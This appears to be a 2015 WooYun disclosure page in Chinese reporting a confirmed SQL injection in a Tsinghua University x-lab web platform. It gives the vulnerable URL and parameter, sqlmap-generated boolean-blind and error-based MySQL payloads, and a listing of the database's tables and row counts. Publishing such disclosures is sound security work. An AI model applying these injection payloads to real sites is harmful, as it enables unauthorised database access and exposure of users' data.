当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156243

漏洞标题:清华大学某平台存在SQL注入漏洞

相关厂商:清华大学

漏洞作者: 路人甲

提交时间:2015-11-27 10:48

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-27: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

详细说明:

http://www.x-lab.tsinghua.edu.cn/?a=projectshow&c=nurture&id=229

11.png

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: a=projectshow&c=nurture&id=229 AND 8585=8585
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: a=projectshow&c=nurture&id=229 AND (SELECT 4122 FROM(SELECT COUNT(*),CONCAT(0x716b6b6271,(SELECT (ELT(4122=4122,1))),0x7178717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
web application technology: Apache
back-end DBMS: MySQL 5.0
Database: x-lab
+----------------------------+---------+
| Table | Entries |
+----------------------------+---------+
| zcn_partner | 7654 |
| zcn_users_log | 6164 |
| zcn_cirf | 4364 |
| zcn_bm | 3529 |
| zcn_mailinglist | 2420 |
| zcn_eir_time | 2248 |
| zcn_members | 1612 | //用户
| zcn_project | 892 |
| zcn_bangzu | 775 |
| zcn_eir_yy | 329 |
| zcn_place | 274 |
| zcn_stat_active | 264 |
| zcn_project_receive | 257 |
| zcn_project_cup | 254 |
| zcn_companies_registry | 214 |
| zcn_voice | 213 |
| zcn_cirf_class | 194 |
| zcn_newslettercon | 167 |
| zcn_zt | 164 |
| zcn_eir_addtime | 155 |
| zcn_project_excellent | 137 |
| zcn_top10 | 133 |
| zcn_type_list | 121 |
| zcn_message | 119 |
| zcn_train | 116 |
| zcn_eir | 101 |
| zcn_zwxx | 48 |
| zcn_zhaomu | 44 |
| zcn_links | 38 |
| zcn_hr | 37 |
| zcn_menus | 36 |
| zcn_type_class | 35 |
| zcn_slider | 29 |
| zcn_president_cup_activity | 27 |
| zcn_project_assess | 23 |
| zcn_users | 20 |
| zcn_video | 20 |
| zcn_zwxx_class | 20 |
| zcn_newsletter | 18 |
| zcn_president_cup | 17 |
| zcn_advice | 14 |
| zcn_articles | 13 |
| zcn_mail_template | 12 |
| zcn_email_queue | 10 |
| zcn_fuwu | 10 |
| zcn_kcxx | 9 |
| zcn_project_class | 9 |
| zcn_cm_cd | 8 |
| zcn_gzf | 5 |
| zcn_users_class | 5 |
| zcn_video_class | 5 |
| zcn_kcxx_class | 4 |
| zcn_links_class | 4 |
| zcn_xmxx | 4 |
| zcn_about | 3 |
| zcn_adflash | 3 |
| zcn_articles_class | 3 |
| zcn_cm_grp_cd | 3 |
| zcn_project_story | 3 |
| zcn_member_video_comment | 1 |
| zcn_network | 1 |
+----------------------------+---------+

22.png

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-11-27 15:04

厂商回复:

谢谢提醒,我们会尽快修改的。

最新状态:

暂无